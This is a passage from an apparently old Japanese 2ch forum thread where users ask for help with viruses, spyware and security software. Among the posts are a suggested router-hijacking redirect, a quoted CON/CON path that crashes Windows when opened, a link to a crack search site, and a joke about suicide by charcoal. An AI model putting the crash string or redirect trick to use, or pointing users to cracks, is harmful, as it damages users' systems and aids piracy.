それからファイルを操作していると突然「explolerを終了します」と出てきて、
強制終了してしまうことが度々あります
あとPCの動きが以前よりも重くなったような気がするんですが・・・
これはひょっとして重要なファイルを削除してしまった事により起こっている現象なのでしょうか？
こういうのに詳しい方、アドバイスよろしくお願いしますm(_ _)m

>>528
Explorerなんてそれだけインストールなんて出来ないし、
初期レジストリさえも持っていないんだろうから
再インストールだろうね
誰かにリカバリーって言われなかった？
詳しい人って言うから俺が来たわけだが、
Explorerの箇所だけだって相当なキーがあるわけだし、
どれがおかしいかなんて誰にもわからないね
あんたに、想像もつかないだろう？

Windows2000SP4
Sleipnir

TorとPrivoxyを併用している者ですが
診断君で確認すると
・漏れ無し
・総合評価A+
・プロクシです proxy判定箇所が 1箇所、疑惑点が 0箇所ありました。
と出ましたが上を見ると自分のリモートホストは表示されています。
ちゃんと匿名になっているのでしょうか？
Tor単体で使うとしっかりリモートホストも隠れています。
併用するとTorが機能しないようになるのは気のせいでしょうか？
ブラウザのプロキシの設定はしっかり確認したので大丈夫です。

>>530
表示されているのなら漏れ漏れ

>>530
torで変なの流通してるから、自分のが正規版か良く確認しておいた方がええよ。

>>531
>>532
ありがとうございます。自分でもう少し調べてみます。

>>527
>まだ発見されていないはずです。

というよりまだ一般に公開されていない状況と思われる　位でしょパンピーは

>>534
同義ではないですか？

HASP4ってなんですか？
会社のPCのパラレルポートに刺さってるんだけど。。？

会社の管理者に聞けよｗ

>>536
暗号化用のキーです。
高価なＣＡＤソフトなどを複製されないように添付される場合が多いですね。

>>523
それって、誰かが自分にウィルスメールを送っているということでしょうか？
でも、送信元はどっかの企業っぽいのですが。全部.comからですし。
あと、そういうメールを届かなくするいい方法ってありますか？
OEの設定では無理っぽいですし。

>>539
メールアドレスを代えれば届かなくなりますよ。

>>537
昼休み中にパッと目に付いて、ちょっと気になったもので。。汗

>>538
サンクス！　またよろしくね。

>>535
>というよりまだ一般に公開されていない状況と思われる
　>同義ではないですか？

公開された状況が発見されていないという意味？

何かやる人は方法を公開してからやるわけじゃないでしょ

>>542
そんなことを言ったら、
銀行で、勝手に振り込むことができるのだが、一般に公開されていない状況と思われるとか、
なんぼでも言えるだろ。

DVDドライブのトレイの開閉がとまらないんですけど助けて！

>>543
はい、なんぼでも言えますけど。「まだ発見されていないはずです。」よりも
ルーターからいきなり銀行振り込みはの事はスルーしとく

>>545
確かに銀行振込は飛躍し過ぎた。まあ、常に危険性はあるのは認めるけど、
公知のものでなければ、前例も考えてほぼ無いとしてもいい事象は多いと思うよ。

筈、と言ったらその根拠が有るようにも聞こえる
初心者から聞かれて「ない」と答えるならわかるけど
それに答える側がセキュリティについて話している中だから

セキュ板的に正しいのは545

おまえらバカなセキュオタだな
回線上で盗聴されたらプライバシーなんてない

>>539
送信元メールアドレスは偽装できる。
よく知っている企業のメルアドが表示されても、
それが本当にその企業から送られているもの
とは限らない。

http://www.glarysoft.com/
Quick StartUp(1.2) PC起動時に自動起動するソフトを管理する

これの日本語版か似たような日本の奴ってありますか？

>>551
その質問のどこがネットワークセキュリティなんだ?

>>527
たとえば、http://192.168.1/hoge.cgi?(WAN側開くパラメータ)とかにリダイレクトする罠踏ませたらどうなるだろう?

>>553
トロイのバックドアと同じ方式か。
作りがやわいルーターなら、やられる可能性ありだな。

スパイキュールにかかってから
ウインドウズメディアプレーヤーが見つかりませんと表示され開けません。
どうしたらいいですか？

それとIEで検索する時、ローマ字入力にしても英語でしか文字が入力できません。
何とかしてください。

ローマ字入力で英語がでるんか？　すげーな

そりゃ羨ましい。
入力したものを英訳してくれるＰＣか。
英語喋れなくても金髪美少女とメール交換し放題だぞ。

ワロヌwww

mediaaccessとか言うスパイウエアが消えなくて困ってます。
駆除ソフトでも消えないのですがどうしたらよいでしょうか？

>>560
再インストール！
なんだかんだ一番楽

聞きたいことがあるのですが、
最近スパイボットをつかってスパイウエアを駆除しました。
そしたらスレイプニールや、ルナスケープでいくつかのページが、
まっしろになったまま表示されなくなってしまいました。
こまったので今は駆除する前の状態にもどっていますが、
スパイウエアを駆除したいんです。
どうせうればこうならずに駆除できますか？

あ、書き忘れました、
OS:WinXPSP2
ブラウザ：スレイプニール
ADSL回線
ちなみにソフトウェア板から誘導されました

>>563
ブラウザ特有の問題なのかどうか。
ＩＥコンポーネントですから、ＩＥでやってみて同じになるか教えてください。
多分、同じ現象になると思います。

あと、表示できなくなったＵＲＬ、表示できるＵＲＬも教えてください。
それと、ファイアーオールソフトの有無。ＸＰｓｐ２のファイアーオール機能のオンオフ、
常駐プログラムなどの情報も欲しいですね。

>>562
駆除したスパイウェアの名前を書いてくれないと全く対応不能です。

ファイアーオール！ファイアーオール！
ゴッゴル！ゴッゴル！

>>564>>566
ファィアーウォールだよ。

不可解なのですが、
何を削除したか覚えてないのでもういちどｽｷｬﾝして、削除してみました。
しかし、以前のようにいくつかのページが開けない、という現象がおこりません。
これはこれでいいんですか・・・？

>>568
何がなにやらさっぱりわかんねーよ！
なんで削除したのに、もう一度削除できたのかわからんし、
現象が起きないってのはそれと関係あるのかわからんし、
これでいいのかなんて分かるわけねーだろ！

俺はアンタじゃないんだよ！説明してくれよ。

>>569
さっきは削除するまえの状態だったんですよ。

564,565をスルーする教えて君は逝け

>>570
なら解決ですね。

>>564
IEでも同じ状態でした。
ウィンドウズファイアーウォールは有効になっています。
↓のアドレスにアクセスしてもまっしろでした。もちろん他にもありました。
ttp://www.2ch.net/
ttp://thebbs.jp/
ttp://monachat.dyndns.org/monachat6.html

>>565
リカバリーでさっき削除したのをみたら、
CnsMin、DSO Exploit,
あとSEX Trackerってのもありました。

最初の以外は関係ないな

ＯＳ入れ直す→スキーリ

>>575
いれなおせば、いままでのことはすべてなかっとことになるんですか？

>>576
そのとおり。でも人生はリセットされないから気をつけてね。

>>577
いや、レンタカー借りてきて、練炭を中で焚くと、
見事に人生のリセットがかかりますよ。

まぁ解決(？)したのかよくわかりませんが、
ありがとうございました。

http://fm54.kir.jp/new2ch.htm

age

先生方に質問
VMWareとかの仮想マシン使って
もし仮想マシン内でウイルスに感染したら、どうなるんでしょうか？
ファイルのやりとりしなくても仮想マシンの外にも飛火しますかね？

>>582
飛び火したら仮想マシンの意味ないやん。

なるほど
大量のウイルスに感染したPCって、どうなるのか遊びで実験してみようかな
PCは一台しかないから、仮想マシンにウイルスのカクテル飲ませてみよう

友人が感染したのですが、XPに感染するネットを繋いだだけで感染するウイルスについて教えてください。
ネットに繋ぐとカウントダウンが始まり電源が切れます。
ウイルス名と、どこかソフトをダウンロード出来るサイト教えてください。

>>585
http://www.microsoft.com/japan/security/incident/sasser.mspx

スレ違いかもしれませんが…違法なケータイサイトを解析してケーサツにそれを説明して、管理人逮捕って可能なんですか？ケータイサイトの解析で個人を特定できるんですか？

>587
URLを通報するだけでいいんじゃねーの？
捕まるほど違法なものなら個人特定とか全部警察がやるんだし。
それに、ただの一般ユーザーに個人特定は無理。

つーか、スレ違いって自覚してるんなら
最初から書くなボケナス

XPsp2　セキュリティセンターFW,自動更新→有効、
ウイルス対策→有効無効どちらの場合でも発生

CD焼くときなど動作を安定させる為、
ノートンのAuto-Protectを切ってるんだけど、数日前から
Auto-Protectをオフにする度にセキュリティ警告が止まらない。

このコンピューターは次の領域においてリスクがあります：
-ウイルス対策がオフです
norton製品を開いてこれらの問題を解決します。
□セキュリティ状態の警告が重複しないように
　Windowsセキュリティーセンターの警告をオフにして
　Norton製品の警告を使う(T)　（推奨）

上のチェックボックスをつけても外しても再度警告が表示される
以前はこんなことなかったのに…　どんな原因が考えられますか？

Norton AntiVirus2004で、ライブアップデート済みです。

>>585
SP1a以前のでリカバリーした厨は、みんな一度は経験してるんだろうな

フリーのウイルスソフトで期限とか無くて日本語化パッチがある
ソフトを教えてください。
OSはXPでメモリは256です。出来れば軽いものが良いのですが
お願いします。

>>592
avast

>>593
ありがとうございます。さっそく導入してみます。

ハッカーにハックされてます 不正アクセスが大量にみられます
除外していたら シン フラッドを使って大量にアクセスしてきましたかなり悪質です。どうしましょ

>>595
回線切って寝なさい。

一年続いてます しつこいです

>>597
ルーター買っておいて置きなさい。連続のsynパケット無視するように出来てるから。

「WINDOWSからALERTヘのメッセージ (2005/03/19 21:52:25)
　SYSTEM ERROR: Windows has detected Spyware running on your computer.
　Spyware can damage critical system files ,track your online activities and display pop-ups.
　Anti-Virus Firewall software can not protect you.
　Visit: www.win-fix.com foe free removal infomation　」　　　　　


さっき、パソコンを起動したとたん、こんなあやしいウィンドウがでたんですが、
何で出たのか不安です。前も同じのが出たことがあります。
なぜ自然にこんなウインドウがでてしまうのでしょうか？
これって何らかのウイルスですか？
出ないようにするのはどうしたらいいのでしょうか？

スパイウェイ侵入してるね スパイボット入れなさい

>>599
www.win-fix.comに行ってはいけない。
電器屋いって、ルータとノートンかバスター買って来なさい。

特定のIPからのアクセスを禁止しようとしてます。ネットで適当に調べた所、
http://www.atmarkit.co.jp/fwin2k/operation/personalsecurity2/personalsecurity1.html
を参考にrouting and access serviceを有効にしてフィルタを設定しました。
が、どうもフィルタリングがうまくいってないみたいです。このやり方では駄目でしょうか。
OSはWindows2000、Bフレッツでフレッツ接続ツールでインターネットに接続してます。
フィルタの設定はアクセスを禁止したいIPアドレスを123.123.123.123とすると
netsh routing ip set filter name="ローカル エリア接続" filtertype=input forward
netsh routing ip set filter name="ローカル エリア接続" filtertype=output forward
netsh routing ip add filter "ローカル エリア接続" input 123.123.123.123 255.255.255.255 0.0.0.0 0.0.0.0 TCP 0 0
netsh routing ip add filter "ローカル エリア接続" output 0.0.0.0 0.0.0.0 123.123.123.123 255.255.255.255 TCP 0 0
と設定しました。

２ｃｈを開いてしばらく経ったら再起動しました原因は何でしょう？
ちなみに今はギコナビで書き込んでいます。ウイルスやスパイウェアを探しましたが出てきません。

>>603
閲覧したスレにトラップが仕掛けられています。
ttp://user.parknet.co.jp/kiyosato/concon.html
＞・IE などのブラウザで、URL に
＞　fｉle：///Ｃ|/ＣＯＮ/ＣＯＮ/ＣＯＮ　を指定する（ con は、aux、prn、nul に置き換えても可）
＞たったこれだけ、非常に簡単な手順でシステム異常を引き起こすことができます。

１度ウィルスにかかってしまい、ネットで違うページに飛ぶたびに
「OBJECT」というウィンドウが表示されます。また、YAHOOにログインしても違うページに飛ぶと
勝手にログアウトしてしまいます。すぐに色々と
チェックしたのですが、ウイルスやスパイウェアは出てきません。
これって何なのでしょうか？教えてくださいｍ（＿　＿）ｍ

質問です。Norton Internet Security 2005を買おうか迷っているのですが疑問に思ったので教えてください。
公式を読んでいると１年間という期限があってウイルス情報の更新などが出来なくなると書いてあります。
質問は二点です

・ウイルス情報の更新をしなければ１年経った後も使いつづけてもいいのか？
・これはＯＳを再インストールしてしまった場合ははまた期限が１年間に戻るのではないのか？

たぶん当たり前の事なんでしょうが初心者ですので教えていただきたいです。よろしくお願いします。

最近２ちゃんのスレ見てるだけでﾉｰﾄﾝが反応して
Bloodhound Exploit.6ってやつにやられます。
今日も４回くらい(ﾉд`)
削除・修復が出来ないので検疫してますが
これなんとかならないですかね？

NortonAntivirus2005、WinXPSP2です。

>>607
俺もノートンスレで同じことになったから、
そのスレ、お気に入り外したわ。

>>607
> ・ウイルス情報の更新をしなければ１年経った後も使いつづけてもいいのか
使ってもいいがウイルスに感染する確率は格段に高くなる
個人で金かけたく無かったらフリーでも使っとけ
仕事で使うなら予算とって毎年更新しろ
さすがにどのソフトもフリーは個人に限定してるからな

>>606のまちがいだ スマソ

>>610
二つ目の再インストールはどうなるのですか？
以前使っていたバージョンでは再インストールするとまた更新期限が１年になった記憶があります。
公式には期限を延ばしてください。と書いていますが再インストールしたいうのはどうやって区別するのでしょうか？
買ってから後で抜け道があったりすると損した気分で悔しいですが、ちゃんと知って納得してから買いたいのです。

>>611
2005にはアクティベーションが必要。
再インストールするなら、またアクティベーションが必要になる。
期間のごまかしはリスクがある。

もうすぐZone alarmの無料版の期限がきれるんですけど、
できれば、１５日おきに削除とインストールして無料版を使いたいです。

普通にアンインストールすれば、また使えますか？
完全なアンインストール情報があれば教えてください。


あと、最強のフリーソフトの組み合わせを３つ入れるとすれば、何ですか？
あなた方のベテランからの考えをご教授ください。

個人的にはkerioに２つを組み合わせればいいかな〜っと思ってるのですが。

>>613
Proの試用版の期限が切れるってことみたいだが、
無料版なら、期限もくそもないだろ

>>614
zone alarm 入ってると、kerio　がzoneをアンインストールしてください
って出るんですよ。
アンチウイルスを最低３つは入れたいですね。

お前ら馬鹿じゃねん！ウィルスなんて怖くもねーよ！ばーか！

ウィルスでもなんでも送ってこいや！馬鹿どもが！

>>615
FWいくつも入れるからだろ。一個に絞れ。

Norton　Internet　Securityについての質問です。

信頼されたLANに対して、他の信頼されていないLANからだとWindowsファイル共有利用できません。
信頼されたLANの他のサーバは利用できます。

これを可能にする設定ってありますか？

みんな信頼しる！

ノートンアンチウイルスで圧縮ファイルの中身をスキャンして感染ファイルが見つかったら圧縮ファイルごと自動削除してくれる設定ってありますか？
感染ファイルのみ削除なら出来るのですが。

>>613
http://www.cracksearchengine.net/search.cgi

ウィルスバスターが「VBS_REDLOF.A」を検知した後、それが原因かどうかは分からないのですが、
HDDの空き容量がどんどん減ってゆき、0に。そして、PCが立ち上がらなくなりました。
ところが1日空くと、PCは起動します。でも、空き容量は、100MBくらいなのです
（本来、もっとあるはず）。
ウィルスを駆除する以外にも、何かするべきことがあるのでしょうか？

キンタマの新種にも感染している気が

＞600　601
回答ありがとうございました。やっぱり問題ありみたいですね。
この前マカフィ インターネットセキュリティを買ってきて、問題が出ないようにwindows2000を再インストールをし直してから入れています。
ただそういえば、windowsのupdateをまだ全然していなかったのでそのせいかもしれません。
windowsのupdateをして様子を見てみます。

>>457に答えてください。

早く答えろクソども！

バカなんですがどうしてバカなのかがわかりません
なぜなのですか？ひろしではありません

>>605
>すぐに色々とチェックしたのですが、ウイルスやスパイウェアは出てきません。
何をやったか書けよ。
それと、このスレの>>1くらいは読んでから質問しろや。

それくらいの情報なら、ここに行って自助努力しろ位の答えになる。
ttp://www.higaitaisaku.com/

　　　　　　　　　∧＿∧ 　　
　　　　　　　　_（　´_ゝ｀）
　　　　　　／　　　　　　）　　　　　　　　　　　＿　　　　　_
　　　　　/　.イ　、　　ノ/　　　　∧ ∧―＝￣　｀ヽ.　＿
　　　　/　/　|　　　（ 〈　∵. ・（　　 〈＿_　>　　゛>>457、＿―
　　　｜　!　 ヽ　　ー＝-￣￣＝_、　　（／　.　´ノ
　　　｜ |　　　｀iー＿＿＝―＿　;.　／　／ ／ 　　
　　　 !、リ　　-=＿二＿＿￣_=;.　／　／　.'
　　　　　　　　/　 /　　　　　　　／　 ／| 　|
　　　　　　 ／　 /　　　　　　　!、＿／ / 　 〉
　　　　　／ ＿/　　　　　　　　　　　　 |_／
　　　　　ヽ、＿ヽ

457
↓↓↓↓↓↓↓↓↓


　　　　　　　　　　　　　　　　　　＿＿ ＿＿ ＿＿ ＿＿ ＿＿_　　　　　　　　　　　　　＿＿ ＿＿
　　　　　　　　　　　　　　　　 ∠＿_∠＿_∠＿_∠＿.∠＿..／ |　　　　　　　　＿＿∠＿_∠＿_∠l＿_
　　　　　　　　　　　　　　　∠＿_∠＿_∠＿_∠＿_∠＿_／|　 |　　　 　 　 ∠＿_∠＿_∠＿_∠＿_／.|＿
.　　　　　　　 　 　 　 　 ∠＿_∠＿_∠＿_∠＿.∠＿.／|　 |／| 　 　 　 ∠＿_∠＿_∠＿_／ 　 ／|　 |／|
.　 　 　 　 　 　 　 　 ／ 　 ／ 　.／ 　 ／ 　 ／　　／!　|／|　 |　　　　 | 　／　　／　　／|￣￣|　 |／|　 |
　　　　　　　 　 　 　 |￣￣|￣￣|￣￣|￣￣|￣￣|　 |／　 |／|　　 　　|＿|￣￣|￣￣|　 |＿＿|／|　 |／|
　　　　　　　　＿＿ _|　 　 |＿＿|＿＿|＿＿|＿＿|／|￣￣|　 |　 　 ∠＿_|＿＿|＿＿l／ 　 ／|　 |／|　 |
. 　 　 　 　 ／ 　 ／ |￣￣|　 |＿|／|　　　　|　 　 |　 |＿＿|／|　　　|　 　 |　 　 |　 　 |￣￣|　 |／|　 |／
　　　　　　|￣￣|￣ .|＿＿|／|　 | 　|　　　　|＿＿|／|　 　 |　 |　　　|＿＿|＿＿|＿＿|＿＿|／|　 |／|
. 　 　 ＿__|＿＿|＿_.|　 　 |　 |＿|／　　 　 |　 　 |　 |＿＿|／ 　 　 |　 　 |　 　 |　 　 |　 　 |　 |／|　 |
. 　 ／ 　 ／ 　 ／　 | 　 　|／|.　　　　 　 　 |＿＿|／|　　　 　 　 　 .|＿＿|＿＿|＿＿|＿＿|／|　 |／
　　|￣￣|￣￣|￣￣|￣￣|　 |.　　　　 　 　 |　 　 |　 |　　　　　　　　 　 　 |　 　 |　 　 |　 |＿＿|／
　　|＿＿|＿＿|＿＿|＿＿|／　　　　　　　　|＿＿|／　　　　 　 　 　 　 　 |＿＿|＿＿|／

　　　　　　　　　　　　　　　　　　　　　　＿_
　　　　　　　　　　　　　　　　　　　　　‖＋|
　　　　　　　　　　　　　　　　　　　　　‖￣
　　　　　　　　　　　　　　　　　　　　　‖
　 　 　 　 　 　 　 　 　 　 　 　 .／|￣￣￣|　　　　∧_∧　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　　　　 .∧＿∧ |　.|: 　　　 :| 　 　　(ﾟДﾟ )__＜入院患者の基地外 >>457 が逃げ出したぞ ｺﾞﾙｧ!!
　　　　　　 　 　 　 　 （ ´Д｀ ）|　.|. 精神 :|　　　　|　 づ/ 　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　 ミﾐ皿皿皿皿皿._)　　 (_皿...|: 病院 :| 皿皿l￣￣￣l皿皿皿_
　　ミﾐ彡ﾐ　 田　田.／　 　 　. `､ | 　 　／| 田 　 田 　 田 　 田　:|
　　ミミﾐミ彡..　　　/,r|　　　 r‐､い|　 ／　 |　　　　　　　　　　　　　:|皿皿皿皿皿
　　ミ彡ﾐミﾐﾐ 　 ［.| | .|　　　{ﾆ　}/.|／　 　 | 田 　 田 　 田 　 田　:|　　　　　 　 |
　　ミミミﾐ巛彡.　 {_}　|　 　 `‐'i"　　 　|　 .|　　　　　　　　　　　　　:|田　田　田│
　　ミ彡彡ﾐミミ　　　/"ヽ-､　.|./|￣￣￣￣|　　　　　　　　　 　　　 |　　　 　 　 │
　　ﾐミミﾐﾐミ彡ミ二. |　 .|　ヽ .| _|　　　 ╋:‖　 |￣￣|　 :|￣￣|　　|田 .三. 　 /□∧
　　|　| i.|...:;;:;;　三≡| 　 |λ {ll|..:|　　:┌─‖　 |┐ _,:|　 :| 　 ._:|　　|＿三二 　(ﾟｰﾟ*;)　 ｱﾗ>>457ｻﾝ
　　|　l i.|:;:;;;;;;;:　 | |　ｍｎ_ ヾ._ﾘ_:| ＿ _|　　‖　 |│＿|　 :|＿＿|　　|　　. ||　 　(y[と)]　　　ﾄﾞｯﾀﾉ？
　　|二二二二二二.{　 .7. ..　l,,,,,|_____..|.Π.‖＿|;;;;;;;;;;;|＿|;;;;;,;;;,;;|＿_|::￣ ￣　　|＿_|
　　::::::::::::::::::::::::::::::::: ヽ_.(　:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::∪∪
　　::::::::::::::::::;;;;;;;:: ￣￣￣￣ ;;;::::;;:: :;;;:::::;L;;;; ::::;;;;;:::::::: :;L;;;;::: :;;;;;::::.................................

今自分はﾈｯﾄをよく利用しているんですがｳｲﾙｽﾊﾞｽﾀｰ等なにもｾｷｭﾘﾃｨｰに関してしていないのでｳｲﾙｽが非常に怖いです。
そこで質問なんですがフリーのソフトでﾈｯﾄで取ってきた圧縮ファイルをｳｲﾙｽｽｷｬﾝにかけられるソフトはありますか？
あとあつかましいですが他にも「これは最低でもつんどいた方がいいだろう」と思われるフリーのソフトを紹介してください。
頼みますた。(´･ω･`)

おまえら人間として恥ずかしくないか？
さっさと質問に答えろ！　

>>633
>>1-9

>>457
そうだよ　バレるの。

X-Cleaner評価版（スパイウェア関係）
これを今から使おうとしているんですがこれを使うと具体的にどういったことが起こるんですか？
ｳｲﾙｽをｽｷｬﾝしてパソコンから削除？をするだけですか？

今x-Cleanerというフリーのｽﾊﾟｲｳｪｱのソフトを使おうとしてるんですがその設定にIEをクリアとあるんですが
これってやばくないですか？そのままの意味でいくとIEの消去ということになるんじゃないんですか？

質問の仕方が悪かったですね・・・すみません。
OSはウィンドウズ2000オフィスでIE6をつかってます。
おとといウィルスをもらってノートン先生がすぐに感知したのですが、
「ファイルの修復に失敗した」との通知がでました。
それからは、ネットでページを移動する度に「OBJECT」「IFRAME」
といったエラーのウィンドウが出てきます。主に画像があるページ
でよく出てきます。でも２ちゃんねるの中では出てきません。
画像が多いページに飛ぶと「IFRAME」のウィンドウがいっぱい出てきて
IEが再起動します。再起動後も状況は変わりません。
ノートン、ADWAREと両方スキャンしましたが、それらしいものは
何も出てきませんでした。
629さんが張ってくださったサイトにも行って履歴・クッキーの削除、
Ｃドライブのエラーチェックとやってみましたが、何も変わりませんでした。
もうＯＳごと入れ替えるしかないのでしょうか？
教えてください。

>>638
スパイウェアはやばい

744_ 名無しさん＠お腹いっぱい。名無しさん＠お腹いっぱい。 05/03/20 21:38:42
x-Cleanerというフリーのｽﾊﾟｲｳｪｱのソフトでｽｷｬﾝしようとしたんですがわからないことがたくさん出てきます。
　　例IEのクリア、WinWar(?)のファイルリストの削除等
どうしたらいいですか？

>>633
同じ事を聞くな。
悪い事は言わない今すぐに買ってでもｲﾝｽｺしろ。
基本的にノートン　マカフィー　バスターどれか入れろ。今すぐニダ。
フリーならAVGかavastだが上の３つの中でどれかは入れろ。





でないと、あぼーんは時間の問題だ。

それらしい単語でググってもちっともわからないんですが、やはりメアドを変えるしかないんでしょうか？

というかNECとアマゾンとE-YAMAしか自分のメアドわからないはずなのに何故？

プロバイダのウイルスチェックって確か？

>>644
完璧

これってセキュリティ上問題ないんでしょうかね？

↓↓↓↓↓


858 名前：番組の途中ですが名無しです　[]　投稿日：05/03/21(月) 00:44:03 ID:YTGQp6d0

ちょっとした祭りになりそうです
どなたかスレ立てをお願いします

【ディレクトリ】ライブドア、セキュリティに疑問【丸見え】
ソース
ttp://image.click.livedoor.com/adi/images/

インデックス無しはザラにあるから
問題になるのは個人情報漏洩になるような時だけ

この次スレがないよ。

ウィルス情報＆質問　総合スレッド☆Part28
http://pc5.2ch.net/test/read.cgi/sec/1108718666/

いきなりwinnyをやっていたらHDDがおかしくなり、ハードディスクを調べてみたらファイルが
増えたり空き容量が増えてDが減っていきおかしいと思って電源ランプを押してパソコンを
切ったらいきなり起動しなくなりました。
これを正しい日本語に治そうぜ。

>>649
=アウチ

パソコンのトラブル解消法のおかげでウィルスが直った人もたくさんいます。
このパソコンのトラブル解消法に感謝しなさい。

時々IEのウィンドウが勝手に開いて外国の宣伝サイトを表示したりする。
良くあるスパイウェアかと思ったんだがノートン、AD-aware、spy-bot
どれを使っても勝手にウィンドウが出てくるのがとまらない・・・
タスクマネージャからプロセス見ても怪しいのが見あたらない。
OSはwin2kなのだけど良い解決方法ないでしょうか？

ふらげとかじゃなく？

SysinternalsのFilemonとProcess Explorerで更新間隔0.5秒設定→放置してただ監視
それとオンラインスキャンをまわる

>>653、654
ありがとう御座います。
取りあえずFilemonを試してみようかと思います。完了したらまた報告します。
ふらげってなんだろ・・・フライングゲットしか思いつかないｗ

OSはWindows2000 SP4でブラウザはIE6SP1です。
回線はADSLです。
WindowsのUpdateは行なっておりません。
セキュリティソフトが鬱陶しいので削除。
ネットサーフィンしていて、レッドロフ感染サイトを探していたら、以下のサイトが見つかる。
ttp://aa4a.com/bushbaby
このサイトを開いてみるが、特に何も変わった様子はないので、IEの窓を閉じた。
次にレジストリエディタを開くと、次の値が
[Kernel32] C:\WINNT\SYSTEM32\Kernel.dll
次のキーに
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
追加されていた。
トレンドマイクロのオンラインスキャンをしてみると、VBS_REDLOF.Aが次の場所で
c:\winnt\system32\kernel.dll
見つかった。
他にも、HTMやHTMLなどの拡張子がついたファイル計39772個にREDLOFが感染していた。
これまでに取った処置は特になく、知り合いや会社にメールを送信しまくり、
今もとりあえずネットに繋いでいる。
それと自分はサイトを持っているのだが、先日webサイトの更新作業が終えたところです。
REDLOFというウィルスはパソコンを起動させなくするウィルスだと言われているけど、
今もちゃんと起動できますので、問題は無いかと。

おーっとここで華麗にスルー！
　　　　　　　　　 ＿
　　　　　　　　 r'::::::::i
　　　　　　　 　 ﾄｰf/__
　　　　　　　／　 ｲ|　､ヽ
　　　　　　 //_〉　l_l　i_ノ､
　＼＼ (_ニノ　〉＿___〉〉 〉
　　　　　　　／　　　　} / 　　 　 　　 　 　 ,_-‐､
　　　　　　／＼／,ｰ 'ヾ　　　　　　　　　　i"_Y 〈i
　　　　　 〈　 <　/　　　　　　　　　　　　　 ゝ^-'"
　　　　　　＼i"ヽ､　　＼＼　　　　　／／
　　　　　　├ i＼i ｶ　　　　　　,､
　　　　　　 |_,,i ノ_ｿ　　　　）　　　　　ゝ

>>656
Microsoft(R) Command Line Interpreter for Java
5.0.3810.0
Virtual Machineに脆弱性がない人には全然関係ないので、
何の迷惑も被りません
勝手にしろ！

取りあえずfilemonで怪しげな動きをしてるexeファイルを突き止めて、
削除して様子見てましたが問題なさそうです。
これにて解決。ありがとう御座いました。

最近ヤフーやgoogleの検索でIEが10秒ぐらいフリーズするようになりました。

検索→フリーズ→結果表示→HPにアクセス→戻るボタン→フリーズ→結果表示に戻る

OSはXP SP2です。

>>660
　 　 　 　 ┏┓　 　 　 　 　 ┏━┓　 　 　 　 　 　 ┏┓　 　 　 　 　 　 　 　 　 　 　 　 　 ┏━━━━┓
　 ┏┓　 ┗┛　 　 ┏┓　 ┗┓┃┏┓┏┓　 ┏┛┗━━┓┏━┓　 　 　 　 　 　 　 ┃┏━━┓┃
┏┛┗━┓┏┓┏┛┗━┓┃┃┃┃┃┃　 ┗┓┏━━┛┗┓┃┏┓┏━━━┓┗┛　 　 ┃┃
┗┓┏━┛┗┛┗┓┏┓┃┗┛┃┃┗┛　 　 ┃┃　 　 ┏┓┗┛┃┃┗━━━┛　 　 ┏━┛┃
┏┛┃┏━┓　 ┏┛┃┃┃　 　 ┃┗━━┓　 ┃┃┏━┛┗┓　 ┃┃　 　 　 　 　 　 　 ┃┏━┛
┃┏┛┗━┛　 ┗━┛┃┃　 　 ┗━━┓┃　 ┃┃┃┏┓┏┛　 ┃┃┏┓　 　 　 　 　 ┗┛
┃┃┏━━┓　 　 　 ┏┛┃　 　 ┏━━┛┃　 ┃┃┃┗┛┃　 　 ┃┃┃┗━━┓　 　 ┏┓
┗┛┗━━┛　 　 　 ┗━┛　 　 ┗━━━┛　 ┗┛┗━━┛　 　 ┗┛┗━━━┛　 　 ┗┛

　　　　　 : __,,,,、　　　　　.,,,,,,,、　　　　　　　　　　　　　　　　　._
　　.l""^ﾞ⌒　 .ﾞ|　　　　　|　 ,|　　 　 　 　 　 ,,,,,,,,､-:--ｰ‐'''"ﾞﾞ｀l
　 .┴'っ　　.,（'＿　.　　　|　 :|　　　　　　　　(　.. .,,,,,,,,　　,,r=''''
..,,,-―'"　 　　　　/　　　.|　 l　 　 　 　 　 　 ﾞ"￣　,r゛ ,,/
: |._,,,,,,,,,,,　,,r'''"~~｀　　　│ . |　　　　,/ヾ,　　　　　.,"　/
　″　 /　.,l″　　　　　　 |　 l: 　　 ,,┘ ,/　　　　 l　 .|
　　　　i､　�_,,,,,,,、　　　　lﾞ　 ヽr-''" .,,,丿　　　　　ﾞl、 ﾞ'ｰ-､
　　　　ﾞヽ,,,,,,,,,,,,,:|　　　　 .ﾞl＿　._,,,;,,／　 　 　 　 　 'ヽ,,,,,_,ﾉ

　　　　　 .l''',!　　　　 .r-、　　　　　 .,､�＝@　　　　　　.l''',!　　　　 ./ｰ､,,,_　　　　 .r-，
　　 .广''''″.¨ﾞﾞ!　 .,,,丿 {,,､､，　　.ｖ-lﾞ .!-ｒ/i､　　广''''″.¨ﾞﾞ!　　　.!､,　　lﾞ　　　　 | .｝　,��
　　 .ﾞl---， ぃ"　 .|　　　　 .|　　 .|　　 _,,{ﾞl .ヽ　 ヽ--i､ .ぃ"　　.,,,,,,,,二ｉ"　　 .,..-" .ヽl、ﾞl
　　 r---┘.―'i､　"',! ./ﾆﾆﾆ、　 ￣| .Ｌ,,,,,ﾞl,,i´ .r---┘.―'i､　 .|　　　 :,!　　 |　　　　.l　.|、
　　 |＿＿　._,,,,｝　　ﾉ .| |　　 lﾞ　　.／　　　ﾞ'i､　.|＿＿　._,,,,｝　　"''''ﾂ ./　　　"''ﾄ .|ﾞi､ ||、ﾞl
　　　.,―-" |　　　 .ﾉ .lﾞ `"ﾞﾞﾞ'"　 ,i´,�〕ﾞﾞ^'i､ |　　.,―-" |　　　　 ../　 `i､　　　 lﾞ ,lﾞ |　|.ﾞl.,ﾉ
　　 .lﾞ .,,,,,,　.＼　　.lﾞ .lﾞ ,，　　　 .lﾞ .|.｝ |　　| .|　 / .,,,,,,　.＼　　 ../　.,.i､ |　　　 lﾞ .lﾞ .| .,! .゛
　　 |　し,,lﾞ .、 ﾞ,!　,lﾞ ,lﾞ.i".ﾞﾞ'''''"!　ﾞl .″.|.,!'''゛ lﾞ　 | .lﾞ,,,,lﾞ .、 ﾞ,!　,/｀／ .| ."'ﾞﾞl　./ .lﾞr┘,lﾞ
